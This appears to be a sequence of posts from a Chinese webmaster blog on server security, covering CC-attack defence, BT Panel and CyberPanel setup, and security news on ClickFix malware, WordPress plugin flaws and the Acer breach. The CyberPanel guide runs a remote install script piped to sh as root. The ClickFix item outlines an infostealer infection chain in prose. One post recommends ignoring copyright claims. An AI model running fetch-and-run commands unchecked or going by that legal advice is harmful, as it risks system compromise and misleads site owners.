还透露黑客手中的资料大部分很可能是编造的,这是因为黑客提供的 Check Point 电子邮件截图中出现了不存在的 Check Point 账户,同时还出现了拼写错误,因此可信度较低。 #### 安全狗值得推荐的免费网站、服务器CC/DDoS防护软件 安全狗是一款运行在VPS、云服务器上的集成防病毒、防入侵、防攻击、防篡改的安全软件,而且是免费下载使用。 主机吧很早之前就接触这款软件,安全狗有两个版本的,一个是服务器安全狗,服务器防护用的,一个是网站安全狗,网站防护用的,可以说非常简单,运行在 winodws系统上就跟我们自己电脑运行的360防毒软件似的。个人建议两个软件都安全,这样才可以达到完美。 对于站长来说,这款软件是非常有效的防护CC/DDoS攻击的工具,可以通过软件智能识别攻击者的IP,对其进行拦截。虽然说现在百度CDN防护已经可以拦截绝大多数攻击,但服务器再装上安全狗的话,可以实现100%拦截攻击。安全狗+百度云加速是非常好的防护攻击组合。 官网地址:www.safedog.cn #### 安全狗如何设置CC攻击防御 所谓的CC攻击,就是攻击者借助代理服务器生成指向受害主机的合法请求,从而实现DDOS和伪装,即ChallengeCollapsar。 我们很多人会有这种体会,当一个网页同时访问的人数特别多的时候,打开的速度就很慢,CC攻击正式通过模拟多个用户(多少线程就是多少用户)不停地进行访问那些需要大量数据操作(就是需要大量CPU时间)的页面,让CPU长时间保持在接近100%的工作状态,永远处理不完请求,导致网络拥塞,阻碍正常的访问。 如何判断网站是否处于被CC攻击的状态下呢?这里提一下三种常见的方法 1、如果网站是动态网站,比如asp/asp.net/php等,在被CC攻击的情况下,IIS站点会出错提示SERVERISTOOBUSY,如果不是使用IIS来提供网站服务,会发现提供网站服务的程序无缘无故自动崩溃,出错。如果网站程序没有问题,基本上可以断定是网站被CC攻击了。 2、如果网站是静态站点,比如html页面,在被CC攻击的情况下,打开任务管理器,看网络流量,会发现网络应用里数据的发送出现严重偏高的现象,在大量的CC攻击下,甚至会达到99%的网络占用,当然,在被CC攻击的情况下网站是没办法正常访问的,但是通过3389连接服务器还是可以正常连接。 3、如果是被小量CC攻击,则站点还是可以间歇性访问得到,但是一些比较大的文件,比如图片会出现显示不出来的现象。如果是动态网站被小量CC攻击,还会发现服务器的CPU占用率出现飙升的现象。这是最基本的CC攻击症状。 网站被攻击是一件十分让人恼火的事情,不仅仅是让网站速度变慢、访问异常,往往还会导致网站关键词排名下降甚至被降权,极大干扰了网站的正常稳定运行。 防御CC攻击可以通过多种方法,禁止网站代理访问,尽量将网站做成静态页面,限制连接数量,修改最大超时时间等,但是主机吧今天给你推荐一个更加方便的方法,那就是使用网站安全狗,顺便附上操作步骤,希望对你有点帮助! 教你怎么用的分割线 首先你得安装一个网站安全狗,访问安全狗官网safedog.cn下载即可,记得要注册帐号哟~ 打开以后,点击进入“资源防护”界面,开启“流量防护” 点击“流量防护”旁的“设置”按钮进入,进入相应的规则设置界面。 每一条规则后面都有个设置按钮,点击该按钮,用户可根据自己的需求修改相应的规则参数。 单 IP 访问上限:设置单位时间内允许通过的最大请求数目。 代理访问上限规则:设置单位时间内代理 IP 的最大数和访问的时间周期。 会话验证规则,我们提供了三种模式,用户可根据需要选择。 高级模式:该模式对所有的访问都会要求进行手动点击验证(网站长期处于被 攻击情况下,建议使用该模式)。 中级模式:该模式对所有的访问都会进行自动验证(网站处于间断性被攻击情 况下,建议使用该模式)。 初级模式:该模式对攻击验证判断较为宽松(正常情况下建议使用该模式)。 CC 防护功能:支持网站白名单、路径白名单。 点击界面下方的“白名单”按钮,就可进入白名单设置界面。用户可根据需要添加相应的白名单。 如果该白名单不需要也可做删除处理。 #### 安全警报:新版ClickFix恶意软件伪装Windows更新,窃密手段极为狡诈 近日,网络安全公司Huntress发布紧急报告,揭露一款名为ClickFix的恶意软件出现了更新变种。其伪装之精密、攻击链之隐蔽,被研究人员评为“迄今为止最巧妙、最险恶的信息窃取形式之一”,对普通用户构成了严重威胁。 精密骗局:从虚假网站到全屏“系统更新” 该恶意软件的主要传播渠道为仿冒热门网站的虚假成人内容平台。其攻击流程经过精心设计,极具欺骗性: 诱饵出现:用户在访问网站时,会遭遇以“广告”或“年龄验证”为名的弹窗。 全屏伪装:一旦点击,屏幕会立即被一个高度仿真的Windows更新界面覆盖,并显示“进度已完成95%”,以此制造紧迫感并麻痹用户。 社会工程学指令:界面随后指示用户按下 Windows键 + R 呼出“运行”对话框,并粘贴一段已预先复制好的恶意命令,最后要求授予其管理员权限。 技术剖析:多层隐匿的核心攻击链 一旦用户执行指令,一个高度规避检测的多阶段攻击便被激活: 滥用合法工具:攻击首先利用系统内置的 mshta 工具来执行初始脚本,这是一种“Living Off the Land”战术,能有效避开传统安全软件的告警。 代码混淆干扰:脚本会运行一段无意义的PowerShell垃圾代码,旨在干扰和混淆安全产品的静态分析。 隐写术应用:整个流程最狡猾之处在于,它会解密一个看似普通的PNG图片文件,并从图片像素数据中提取出真正的Shellcode指令。这种隐写术 的运用,使得恶意载荷在静态存储时极难被察觉。 内存注入:最终提取的Shellcode会被注入到当前正在运行的合法系统进程中,实现内存驻留,进一步隐藏自身。 最终危害:窃取敏感数据 完成上述复杂加载流程后,该恶意软件会最终部署Rhada-manthys 或 LummaC2 等专业的信息窃取程序。这些恶意软件会全面扫描并窃取受害者本地存储的各类敏感信息,包括: 浏览器中保存的用户名与密码 加密货币钱包文件与密钥 保存的银行卡凭证及其他个人身份信息 所有被窃取的数据都会被发送至攻击者控制的境外服务器。 防御建议与总结 Huntress指出,此变体自十月初以来持续活跃。为防范此类攻击,用户务必牢记: 保持极度警惕:仔细核对网站域名,对任何不请自来的弹窗和验证要求保持怀疑。 切勿盲从指令:绝对不要在电脑上运行由不可信来源提供的任何命令,尤其是要求管理员权限的指令。 理解正常流程:正规的Windows更新绝不会要求用户在“运行”框中输入命令来完成。 此案例再次表明,网络攻击者的社会工程学手段正日益精进,将技术欺骗与心理操纵相结合,用户需提升安全意识以应对不断演变的威胁。 #### 安卓要向手机厂商收费?360周鸿祎:“没有永远免费午餐” DoNews1 月 4 日消息(记者 赵晋杰)这两天安卓官方推特的一条收费消息搅乱了整个手机圈。该消息称,安卓计划在 2019 年第三季度向中国制造商收费,厂商名单包括华为、中兴、小米等。不过,很快这条推文就被删除。安卓发出这条消息也的确事出有因。就在几个月前,欧盟以“滥用其在安卓领域的主导地位”为由,对谷歌开出43. 4 亿欧元(约合人民币 339 亿元)的天价罚单。对此,谷歌方面曾直接抗议称,Android能够免费的商业模式就是依赖于在系统中内置应用的服务,如果罚款落实,将会破坏Android 生态长期以来的平衡,可能不会再免费开源。据外媒报道,根据安卓定价文件,在英国,瑞典,德国,挪威和荷兰这些国家,像素密度高于500 ppi的设备需要支付 40 美元的费用; 400 到500ppi设备将支付 20 美元的费用;而400 ppi以下的设备只需支付 10 美元。360 公司董事长兼CEO周鸿祎也在本周四对“安卓收费”表态,称“这个是假消息, 但是收费应该是迟早的事。没有永远免费的午餐,厂商应该提前做好准备,不要把成本加给用户。”(完) #### 安卓通知系统被曝新漏洞:可引导用户进入钓鱼网站 6 月 14 日消息,安全研究员 Gabriele Digregorio 昨日(6 月 13 日)揭露称安卓通知系统存在漏洞,影响安卓 14/15/16 版本,涉及 Pixel 9 Pro 等多款机型。谷歌随后承认该漏洞,并表示会尽快分发补丁修复。 该漏洞涉及通知的“打开链接”按钮,用户在点击后,被重定向到与通知显示不符的网址。这一问题源于消息中隐藏的 Unicode 字符,它们会干扰系统对链接文本的解析。 IT之家援引博文介绍举例如下,通知可能显示为 Amazon.com,但点击后却跳转至 zon.com。这种误导可能被不法分子利用,诱导用户访问钓鱼网站或触发应用内危险操作。 Google 已于 3 月获悉此漏洞,并将其定性为中等严重级别,计划在未来安全更新中修复。截至目前,Android 14、15 和 16 版本均受影响,包括 Pixel 9 Pro 等设备。 谷歌发言人表示,公司正在积极开发解决方案,并提醒用户避免点击来自未知或可疑发送者的链接。作为临时措施,用户应避免直接点击通知中的链接,建议手动打开相关应用并仔细核对链接真实性,以防潜在风险。 #### 安徽汽车网疑似被程序员删库跑路 目前已经打不开 3月28日 消息:今天,后厂村之花、互联网的那点事等多名大V在微博爆料,称安徽汽车网程序员删库跑路,只留下1 张图片做官网。 根据爆料的截图显示,该网站虽然页面上还有新闻内容,但查看代码发现,网站的内容全是由图片组成,点击网站内容毫无反应。小编打开官网发现,目前该页面已无法访问,显示为502。此外,安徽汽车网APP也已经无法正常使用,显示网络连接异常。目前,官方暂未对此做出回应。 公开资料显示,安徽汽车网成立于 2003 年 9 月 5 日,是安徽省汽车行业颇具影响力的网络服务提供商。主体公司为合肥久度网络科技有限公司,注册资本 3 万元。合肥久度网络科技有限公司于 2018 年 9 月 13 日备案安徽汽车网域名,营业至今仅 6 个月左右。 #### 安装CyberPanel 教程(官方版) 要求 全新安装 Ubuntu 20.04、Ubuntu 22.04、CloudLinux 7、CloudLinux 8、AlmaLinux 8、AlmaLinux 9 的服务器。 1024MB RAM 或更高 10GB磁盘空间 安装 CyberPanel 第 1 步:通过 SSH 连接到您的服务器 CyberPanel的安装非常简单。首先,以 root 用户身份通过 SSH 登录您的服务器(sudo 不起作用)。您可以从您的虚拟主机获取登录详细信息。 步骤 2:更新程序包 对于 Ubuntu:对于 CentOS/Alma/Rocky:sudo apt update && sudo apt upgrade -y sudo yum check-update sudo yum update 步骤 2:运行安装脚本 运行以下命令。它将启动自动安装脚本,该脚本将提示您决定要安装哪个版本的 LiteSpeed 以及要安装哪些附加组件。 sh <(curl https://cyberpanel.net/install.sh || wget -O - https://cyberpanel.net/install.sh) 如果由于某种原因,您无法登录 ,您可以使用此命令root sudo su - -c "sh <(curl https://cyberpanel.net/install.sh || wget -O - https://cyberpanel.net/install.sh)" 第 3 步:选择要使用的 LiteSpeed 版本 选择要安装的 LiteSpeed 版本。选择 OpenLiteSpeed。 CyberPanel Installer v2.1.2 RAM check : 184/981MB (18.76%) Disk check : 7/30GB (27%) (Minimal 10GB free space) 1. Install CyberPanel with OpenLiteSpeed. 2. Install Cyberpanel with LiteSpeed Enterprise. 3. Exit. Please enter the number[1-3]: 如果选择了 LiteSpeed Enterprise,您将看到以下提示。输入您的序列号 If you do not have any license, you can also use trial license (if server has not used trial license before), type TRIAL 请输入您的LiteSpeed WebServer Enterprise序列号: 第 4 步:选择选项和加载项 您将看到一系列有关可用不同选项和附加组件的提示。 全方位服务(默认 Y): PowerDNS系统 - 开源DNS服务器 Postfix - 开源邮件传输代理 Pure-FTPd  - 开源FTP服务器 远程 MySQL(默认 N): 允许在远程服务器上安装数据库 CyberPanel版本(默认最新版本): 您可以选择安装以前版本的 CyberPanel,或按 Enter 键安装最新版本 密码(默认为“1234567”): 建议您使用“s”设置自己的强密码 Memcached 89(默认 Y): 分布式内存对象缓存系统 Redis(默认 Y): 内存中数据结构存储,用作数据库、缓存和消息中断 Watchdog (默认为是): 内核Watchdog 监视系统是否正在运行。由于无法恢复的软件错误,它应该自动重新启动挂起的系统 第 5 步:安装 安装过程将自动进行。这将需要 5-10 分钟,具体取决于服务器的速度。 步骤 6:完成安装 在安装过程结束时,您将看到以下屏幕,其中包含有关配置的重要信息。选择并将其复制到安全位置以供将来参考。 ################################################################### CyberPanel Successfully Installed Current Disk usage : 7/30GB (26%) Current RAM usage : 313/981MB (31.91%) Installation time : 0 hrs 11 min 0 sec Visit: https://<your server's IP address>:8090 Panel username: admin Panel password: <the password you set during installation> Visit: <your server's IP address>:7080 WebAdmin console username: admin WebAdmin console password: TSXMwny4zVeDg37K Visit: https://<your server's IP address>:8090/rainloop/?admin Rainloop Admin username: admin Rainloop Admin password: gQKFWm9O3nr7Xn Run cyberpanel help to get FAQ info Run cyberpanel upgrade to upgrade it to latest version. Run cyberpanel utility to access some handy tools . Website : https://www.cyberpanel.net Forums : https://forums.cyberpanel.net Wikipage: https://docs.cyberpanel.net Docs : https://cyberpanel.net/docs/ Enjoy your accelerated Internet by CyberPanel & OpenLiteSpeed ################################################################### If your provider has a network-level firewall Please make sure you have opened following port for both in/out: TCP: 8090 for CyberPanel TCP: 80, TCP: 443 and UDP: 443 for webserver TCP: 21 and TCP: 40110-40210 for FTP TCP: 25, TCP: 587, TCP: 465, TCP: 110, TCP: 143 and TCP: 993 for mail service TCP: 53 and UDP: 53 for DNS service Your provider seems blocked port 25 , E-mail sending may not work properly. 步骤 7:重新启动服务器 Would you like to restart your server now? [y/N]: 输入“y”重新启动。或者在执行其他所需操作后稍后输入“重新启动”。 第 8 步:访问 CyberPanel 成功安装后,您可以使用以下详细信息访问 CyberPanel(请务必更改): URL: https://<Your Server's IP Address>:8090 Username: admin Password: <the password you set during installation> 故障 排除 安装后出现 503 错误 如果您在安装 CyberPanel 后收到 503 错误,您可以执行以下操作之一。 1. 检查 LSCPD 状态。 systemctl status lscpd 如果 LSCPD 未运行,请使用以下命令启动 LSCPD: systemctl start lscpd 2. 手动设置 virtualenv source /usr/local/CyberCP/bin/activate pip install --ignore-installed -r /usr/local/CyberCP/requirments.txt deactivate virtualenv --system-site-packages /usr/local/CyberCP systemctl restart lscpd 3. 安装日志 如果在这些步骤之后仍然遇到问题,您可以尝试在安装日志中查找错误,它们位于: /var/log/installLogs.txt 4. 提交错误报告 如果以上都失败了,请提交错误报告 163. #### 安装这些WordPress网站插件赶紧更新 3月2日 消息:到目前为止,WordPress是互联网上使用最广泛的网站建站技术。根据最近的统计,超过35%的互联网网站使用WordPress CMS(内容管理系统)。 由于WordPress有着大量的用户,也就成为攻击者的目标。据报道,今年 2 月份以来,针对WordPress网站的攻击越来越频繁。几家专门从事WordPress安全产品的网络安全公司,如Wordfence、WebARX和NinTechNet,已经报道了对WordPress站点的攻击数量不断增加。 2 月份,有报发现所有新攻击都集中在利用WordPress插件中的漏洞,而不是WordPress本身的问题。许多攻击的目标是最近修补的插件漏洞,黑客希望在网站管理员有机会安装安全补丁之前劫持网站。 然而,也有一些攻击也稍微复杂一点。一些攻击者还发现并开始利用零日漏洞。以下是以下是二月份发生的针对新WordPress插件漏洞攻击的总结。建议网站管理员赶紧更新下列出现的WordPress插件,避免相关网站接下来遭黑客攻击利用。 Duplicator 根据Wordfence的一份报告,自 2 月中旬以来,黑客已经利用了Duplicator中的一个漏洞,这是一个允许站点管理员导出其站点内容的插件。 该漏洞允许攻击者导出该站点的副本,并从中提取数据库凭证,然后劫持WordPress站点的底层MySQL服务器,之后在1.3. 28 修复。 更糟糕的是,Duplicator是WordPress门户上最流行的插件之一,大约在 2 月 10 日攻击开始时,其安装量超过 100 多万次。另外 17 万个站点上安装的该插件的商业版本Duplicator Pro也受到了影响。 Profile Builder 免费版和专业版的Profile Builder插件中还有另一个主要漏洞,允许黑客在WordPress网站上注册未经授权的管理帐户。 该漏洞于 2 月 10 日被修复,但攻击开始于 2 月 24 日。根据报告,至少有两个黑客组织正在利用这个漏洞。超过65, 000 个站点(50, 000 个使用免费版本,15, 000 个使用商业版本)容易受到攻击,除非它们将插件更新到最新版本。 ThemeGrill Demo Importer 另外一个漏洞存在于ThemeGrill Demo Importer,该插件附带了出售商业WordPress主题的web开发公司ThemeGrill出售的主题。 WordPress安全公司WebARX表示,老版本的ThemeGrill Demo Importer很容易受到未经身份验证的攻击者的远程攻击。黑客可以将站点的内容重置为零,有效地清除了所有WordPress站点中ThemeGrill主题激活的内容,并且安装了易受攻击的插件。 此外,如果站点的数据库包含一个名为“admin”的用户,那么攻击者将被授予对该用户的访问权,该用户拥有站点的完全管理员权限。超过 20 万个站点安装了这一插件,建议尽快更新至v1.6. 3 版本。  ThemeREX Addons 安全人员还发现了针对ThemeREX插件的攻击,这是一个预装了所有ThemeREX商业主题的WordPress插件。根据Wordfence的报告,攻击始于 2 月 18 日,当时黑客发现了插件的零日漏洞,并开始利用它在易受攻击的站点上创建流氓管理帐户。 尽管攻击仍在继续,但始终没有提供补丁,网站管理员被建议尽快从他们的网站删除插件。 Flexible Checkout Fields for WooCommerce 攻击还针对运行 Flexible Checkout Fields for WooCommerce插件的网站,该插件安装在超过20, 000 个基于WordPress的电子商务网站上。 黑客利用一个(现已修补)零日漏洞注入XSS有效负载,可在登录管理员的仪表板中触发。XSS的有效载荷允许黑客在易受攻击的网站上创建管理账户。 自 2 月 26 日[1,2]以来,该类型攻击一直在进行。 此外, Async JavaScript、10Web Map Builder for Google Maps、Modern Events Calendar Lite 三款插件也存在类似的零日漏洞,它们分别应用在了100,000、20, 000 和40, 000 个站点。(zdnet) #### 完美解决网站被广东IP采集问题 最近一段时间,很多站长被广东的IP搞惨了,原因是出现了大量广东IP刷网站的资源,导致网站服务器CPU、带宽占满。 这些恶意访问的IP都有一个特点,广东,而且是广东各地的家庭带宽。传统的防火墙根本无法拦截,因为传统的防火墙只能拦截固定IP或者IP段的,而广东这些是广东的各地的,如果把整个广东拦截了损失很大。 甚至这些访问的浏览器UA也是不一样的,访问的URL也不一样,主机帮还发现使用JS挑战人机验证也没用,对方甚至可以直接通过人机验证,这就很让人头疼了。 那么要怎么解决呢?最有效的办法是识别机器设备,而在WAF拦截规则中,有一种非常有效的机器识别技术,那就是JA3指纹,这是一种结合了电脑系统+SSL套件组合的指纹识别方法,只要网站部署了,用户访问你的网站就会有固定的指纹值,这个指纹值是很难改的,除非对方换机器设备,但这成本很高,一般的恶意爬虫机器是没有这个实力的。 目前国内高级点的应用防火墙中都支持JA3指纹拦截,不过需要开通bot防护,这需要高级版本才行,价格贼贵,而百度云防护专业版就支持,很良心。主机帮也确实使用了这个方法给客户成功拦截了这些恶意请求,比如大足网 还有主机帮自己的博客也使用了JA3拦截 这些拦截的IP都有一个特点,广东IP,广东各地的家用带宽IP。 目前来看,百度云防护的拦截效果是非常好的,可以完美解决广东IP恶意访问问题,而且基本0误杀。 有需要的同学可以了解一下:https://www.zhujib.com/shop/26864.html #### 完蛋!百度对文库、表格等范文类进行AI搜索化了 做网站的范文类站长可能要头疼了,百度开始对文库、表格等范文类的搜索进行AI搜索化了,目前涉及到相关搜索的,会出现一个AI框,这个框贼大。几乎占了满屏的搜索结果。如下图: 做SEO的同学都知道,前排占搜索引擎流量非常大比重的,百度直接把前排让给AI生成结果,再加上百度竞价广告、百度文库排名等,第三方网站想从百度拿流量非常难啦。 前排点击强制要求登陆百度帐号 主机吧点击进去后,发现居然是跳转百度文库的,看来是强行推广AI文库,而且百度文库是收费的。 看来百度穷疯了啊,虽然百度以前也强行在搜索结果插入文库,但这次显然是更强势了,用AI引导用户下载生成AI范文,显然更容易让客户接受,这次做范文的网站危险了! #### 宏碁服务器被入侵 黑客挂牌出售盗取的160GB数据 3月8日消息,电脑制造商宏碁公司确认,有人入侵了其一台服务器,并在网上出售声称是宏碁机密信息的160GB数据。 我们最近发现了一起未经授权访问我们维修技术人员文档服务器的事件,”宏碁发言人周二说,目前我们的调查仍在进行中,但没有迹象表明该服务器上存储了任何消费者数据。” 据网络犯罪论坛Breach Forums上一个化名为Kerne lware的黑客周一发布的帖子称,从宏碁窃取的各种机密资料”共计160GB,包括655个目录和2,869个文件。 Kernelware声称窃取的资料包括机密幻灯片和演示文稿、员工技术手册、Windows镜像格式文件、二进制文件、后端基础设施数据、机密产品文档、替换数字产品密钥、ISO文件、Windows系统部署映像文件、BIOS组件和ROM文件。 说实话,这里面有太多东西了,我要花好几天才能看完被泄露的内容哈哈,”Kernelware吹嘘道。 Kernelware说他只接受门罗币作为支付方式,并且只通过中间人出售,并告诉潜在买家通过私信报价。 #### 官网图片侵权被告怎么处理? 最近,在4414站长论坛上看到一位站长发的帖子,起因是该站长的官网有一张图片,使用了千图网素材,现在找上门了,也没直接说要多钱,只是让协商沟通。 主机吧认为协商沟通十人八九是想要钱了。 主机吧以前也遇到过这类情况,但主机吧什么也没做,不用理睬,后面也没有真被告。主机吧认为很多这些图片版权的告知函都是唬人的,你不理他就行了,有本事就告,而且这类案件太多了,法院都不给予支持了,甚至都不接这类案件。 有论坛的站长也有差不多的经历,选择让他告,最后也是不了了之。 所以,遇到这种侵权告知函不要慌,先弄清楚哪几张图片侵权了,然后把他删了就行了,不用找对方,也不用理对方要求,如果真被告了,大大方方去法院,即使后面判输了,被判赔偿的钱也绝对不会比他们索赔的价格高。 #### 宝塔Linux正式版 7.9.7更新 宝塔Linux正式版 7.9.7更新,更新日期:2022/12/21 【增加】增加SSH登录密钥重新生成【增加】增加废弃node.js虚拟环境自删除机制【增加】增加异地登录告警【增加】登录面板增加表单验证机制【增加】登录入口增加反爬虫机制【增加】增加对部分敏感信息通信过程的RSA加密机制【增加】会话验证中增加IP/User-Agent验证【优化】优化aarch64加载器【优化】优化Node.js虚拟环境获取机制【优化】优化ssh登录告警的速度【优化】优化日志过滤【优化】优化通过命令行申请面板SSL的机制【优化】优化文件编辑器对脚本文件换行符的处理【调整】调整删除网站时自动检测根目录是否被其它网站使用【调整】调整请求日志维度【调整】将所有云端通信改为https【调整】回收站批量删除加输入验证【调整】移除不必要的调试输出【调整】更新python依赖库版本【修复】修复json转换过程的意外【修复】修复子目录绑定中文域名转码的问题【修复】修复特定场景下无法删除计划任务问题【修复】修复部分响应未传递上下文到日志的问题【修复】修复回收站无法显示包含特征符号的文件名【修复】修复备份时排除属性一直追加的问题【修复】修复旧的钉钉配置导致的报错【修复】修复网站和目录备份排除规则写法无效的问题【修复】修复回收站文件包含特殊字符时无法彻底删除的问题 #### 宝塔 mysql被CC攻击 导致关闭如何解决? 最近有站长遇到,网站被CC攻击后,mysql数据库自动关闭的问题,主机吧去年也遇到过这个问题,后来解决了,今天我们说说去年主机吧是如何解决的。 首先mysql数据库自动关闭是因为网站承受的动态请求过高导致的,为解决这个问题主机吧曾经升级过服务器,不过并没什么效果,被CC攻击后一样会自动关闭。 最后主机吧使用了云数据库解决了,主机吧发现云数据库虽然写得配置很低,但是即便是一个1核的云服务器,被CC攻击后依然是正常的,只不过网站访问会变得慢很多,甚至网页出现502的情况,也就是WEB PHP死了,云数据库都没死,这点是防CC不错,起码抗攻击能力强很多。 操作很简单,只需要把原来mysql的数据库备份导入云数据库上,然后在网站源码上修改连云数据库的帐号密码即可。不过云数据库即使是最便宜的套餐,一年也差不多跟服务器费用一样了,价格不算便宜,有钱的同学可以使用。 解决mysql数据库自动关闭问题了还不行,因为CC攻击一样会影响到PHP、Nginx等,为此主机吧的解决方案是给网站接入高防CDN,目前主机吧这边用得最好的高防CDN是京东云星盾,使用商业版的就可以解决绝大多数CC攻击了。 接入成功后,开启防火墙设置即可防御CC攻击了,不仅可以保障网站免受CC攻击困扰,同时还可以免受DDOS攻击,给服务器造成停机的困境。 有需要的同学可以联系主机吧购买,目前商业版1710元一年。 购买链接https://zhujib.com/jdxingdun.html #### 宝塔启动apache出现SSLCertificateFile: file '/etc/letsencrypt/live/zhujib.com/fullchain.pem' does not exist or is empty 今天不知为何服务器启动不了apache了,显示SSLCertificateFile: file '/etc/letsencrypt/live/zhujib.com/fullchain.pem' does not exist or is empty 看情况好像是,SSL冲突,于是主机吧进入网站管理,把SSL关闭了 就解决了。 关闭后再重启就解决了。 #### 宝塔如何查看防火墙规则 最近遇到一客户服务器防火墙把高防IP给屏蔽了,导致高防IP无法连接源服务器,经过查询我们发现原来是客户开启的宝塔防火墙导致的。 如查看宝塔防火墙规则呢? 我们只需要在宝塔SSH终端输入以下命令即可。 centos7:firewall-cmd --list-all centos6:iptables -L -n 提示:firewalld is not running 表示防火墙未运行。未运行 #### 宝塔控制面板与 CDN 源 IP 泄露 使用宝塔控制面板时,即使已经套用了 CDN,仍有几处常见配置会把源站真实 IP 暴露给外部扫描器(Censys、Shodan 等)。归纳如下: 风险点 1. 设置默认站点 1.1产生原因 IP 直接访问时,Nginx 会把请求落到“第一个”站点,从而返回该站点的 SSL 证书(含域名),再结合证书即可反查到源 IP。 1.2快速检查方法 浏览器直接访问 https://源站IP,看证书里的 Common Name 是否为你的域名。 1.3规避/修复办法 在宝塔新建一个空白站点并设为 默认站点或者取消默认站点。 成功修复 2. 宝塔面板本身暴露 2.1产生原因 宝塔默认监听 8888/7800 端口,且部分版本默认证书 CN 为面板域名,可被扫描器关联到源 IP。 2.2快速检查方法 https://源站IP:8888 看是否能打开宝塔登录页。 2.3修复方法 修改宝塔面板默认端口,在“面板设置”里绑定独立域名并开启面板 自签SSL; 3. 邮件、接口主动外发 3.1产生原因 站点发信、API 回调、DNS 解析记录等,都可能把源 IP 直接带出去。 3.2快速检查方法 查看邮件源码、DNS 历史解析记录。 3.3修复方法 使用第三方邮件网关或 SMTP 中继。 4. 证书透明日志(CT) 4.1产生原因 申请/续签 Let’s Encrypt 等证书时,会把域名与源 IP 记录到 CT 日志,被 Censys 抓取。 4.2快速检查方法 在 https://crt.sh 或 censys.io 搜域名。 4.3修复方法 证书申请使用DNS验证方式,或采用双证书策略(CDN 用公开证书,源站用自签)。 5. 未屏蔽扫描器 IP/UA 5.1产生原因 Censys、Shodan 等会定期全网扫描 443/80 端口,收集证书与 banner。 5.2快速检查方法 访问日志里出现 CensysInspect、shodan.io 等 UA。 5.3修复方法 利用防火墙屏蔽 UA包含censys、Shodan 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 #### 宝塔控制面板看不到挂载的硬盘解决办法 最近帮一客户处理安装宝塔系统,但是出现一问题,硬盘明明分区挂载了,却在宝塔控制面板却一直只显示系统盘 后台才发现原理是宝塔没有更新过来。解决办法很简单:进入宝塔面板首页- 修复面板 修复后强制刷新就可以看到了。 #### 宝塔服务器负载和cpu经常100%。怎么解决呢? 问题:宝塔上一个网站,但负载和cpu经常100%。怎么解决呢? 在宝塔面板(BT Panel)上部署的网站若频繁出现负载和CPU占用率飙升至100%,通常由代码性能、资源配置、流量异常或外部攻击等因素导致。以下从问题定位到解决方案的系统化排查与优化步骤: 一、快速定位问题根源 1. 实时监控进程 通过SSH/宝塔终端执行命令: top # 按CPU排序进程(按P键) htop # 更直观的进程监控(需安装) 观察占用高的进程(如PHP-FPM、MySQL、Java等)。 2. 检查宝塔资源监控 登录宝塔面板 → “监控” → 查看历史CPU、内存、磁盘IO、网络流量趋势。 “计划任务” → 检查是否有高负载的定时任务(如日志切割、备份)。 3. 分析网站日志 宝塔面板 → “网站” → 对应站点 → “日志” → 查看访问日志(access.log)和错误日志(error.log)。 关键排查点: 高频重复请求(如爬虫、CC攻击)。 大量5xx/4xx错误(如数据库连接失败、PHP脚本超时)。 慢请求(响应时间>1秒)。 二、针对性优化方案 1. PHP类程序优化 调整PHP-FPM配置: 宝塔面板 → “PHP” → 对应版本 → “性能调整”:ini pm = dynamic # 进程管理方式 pm.max_children = 50 # 根据内存调整(每个进程约30MB内存) pm.start_servers = 5 pm.min_spare_servers = 2 pm.max_spare_servers = 8 request_terminate_timeout = 30 # 防止PHP脚本长时间挂起 启用 OPcache(宝塔PHP设置 → “安装扩展” → 安装OPcache)。 优化代码: 避免循环内执行SQL查询、减少文件实时读写。 使用缓存(如Redis/Memcached缓存数据库查询结果)。 2. MySQL数据库优化 开启慢查询日志: 宝塔面板 → “数据库” → “管理” → “慢查询日志” → 开启并分析。 使用EXPLAIN优化SQL语句,添加缺失索引。 调整InnoDB参数(宝塔MySQL配置 → “配置文件”): innodb_buffer_pool_size = 1G # 设置为物理内存的60%-70% innodb_log_file_size = 256M query_cache_type = 0 # 高并发场景建议关闭查询缓存 3. Nginx配置优化 限制并发与频率: 宝塔面板 → “网站” → 对应站点 → “配置文件”: # 限制单IP并发连接数 limit_conn_zone $binary_remote_addr zone=perip:10m; limit_conn perip 20; # 限制请求速率 limit_req_zone $binary_remote_addr zone=reqlimit:10m rate=10r/s; location / { limit_req zone=reqlimit burst=20 nodelay; } 启用静态缓存: 宝塔 → “网站” → “反向代理” 或 “缓存配置” → 启用Nginx缓存:nginx location ~* \.(jpg|css|js)$ { expires 30d; access_log off; } 4. 防御异常流量 安装宝塔防火墙插件: 在宝塔应用商店安装 “Nginx防火墙” 或 “Apache防火墙”。 配置规则: 拦截恶意User-Agent(如Scanner、Bot)。 设置CC防御(默认5秒内10次请求触发拦截)。 屏蔽攻击IP: 通过防火墙日志(/www/wwwlogs/btwaf.log)提取攻击IP。 在宝塔防火墙 → “IP黑名单” 中添加。 三、服务器级优化 1. 升级硬件资源 垂直扩容:升级CPU核心数、内存(适用于突发流量)。 水平扩展:部署负载均衡(如Nginx反向代理多台后端服务器)。 2. 调整内核参数 编辑/etc/sysctl.conf(需SSH执行): net.core.somaxconn = 65535 net.ipv4.tcp_max_tw_buckets = 6000 net.ipv4.tcp_fin_timeout = 30 生效配置: sysctl -p 3. 启用Swap分区 避免内存耗尽导致进程崩溃(1GB内存建议设置2GB Swap): dd if=/dev/zero of=/swapfile bs=1M count=2048 mkswap /swapfile swapon /swapfile echo "/swapfile swap swap defaults 0 0" >> /etc/fstab 四、高级排查工具 1. 性能剖析工具 PHP性能分析:安装Xdebug或Blackfire定位代码瓶颈。 MySQL诊断:使用pt-query-digest分析慢查询日志。 系统级监控:安装netdata或Prometheus + Grafana可视化监控。 2. 应急降级策略 静态化降级:攻击期间返回静态页(宝塔面板 → “网站” → 关闭PHP/MySQL)。 临时限制访问:通过iptables限制非关键地区IP访问。 总结 通过以下优先级逐步解决问题: 定位进程 → 确认是PHP、MySQL还是外部攻击导致。 优化配置 → 调整PHP-FPM、MySQL、Nginx参数。 防御流量 → 启用防火墙,限制异常请求。 硬件升级 → 资源不足时扩容。 若问题仍存在,可使用 strace 追踪进程系统调用,或通过 perf top 分析CPU热点函数。宝塔环境推荐结合日志分析与防火墙插件快速止血,再逐步深入优化代码和架构。 #### 宝塔系统如何分析网站空间访问日志 